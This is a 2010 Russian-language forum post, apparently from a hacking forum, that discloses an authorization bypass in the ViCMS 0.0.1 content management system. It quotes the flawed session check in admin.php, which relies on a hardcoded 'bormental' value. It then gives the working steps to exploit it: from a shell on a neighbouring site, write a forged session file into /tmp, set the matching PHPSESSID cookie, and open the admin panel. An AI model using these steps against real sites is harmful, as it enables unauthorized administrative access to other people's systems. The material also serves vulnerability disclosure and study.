05.07.2010, 15:52
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Product: ViCMS
Version: 0.0.1
Download: www.sourceforge.net/projects/cmscolvi/
Authorization bypass
Need: шелл на соседнем сайте; доступ на запись в /tmp
file: admin.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]session_start[/COLOR][COLOR="#007700"]();
if(!isset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'logged_in'[/COLOR][COLOR="#007700"]])){
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: ./login.php'[/COLOR][COLOR="#007700"]);
exit;
}
if([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'logged_in'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]'bormental'[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: ./login.php'[/COLOR][COLOR="#007700"]);
exit;
}
[/COLOR][/COLOR]
result:
1. Создаём сессию
Имя: sess_8bf6d5e1d9eec3a8436704f883068ebf
Содержание: logged_in|s:9:"bormental";
2. Сохраняем в /tmp
3. В куки пишем: PHPSESSID=8bf6d5e1d9eec3a8436704f883068ebf
4. Заходим http://[host]/admin.php
|
|
|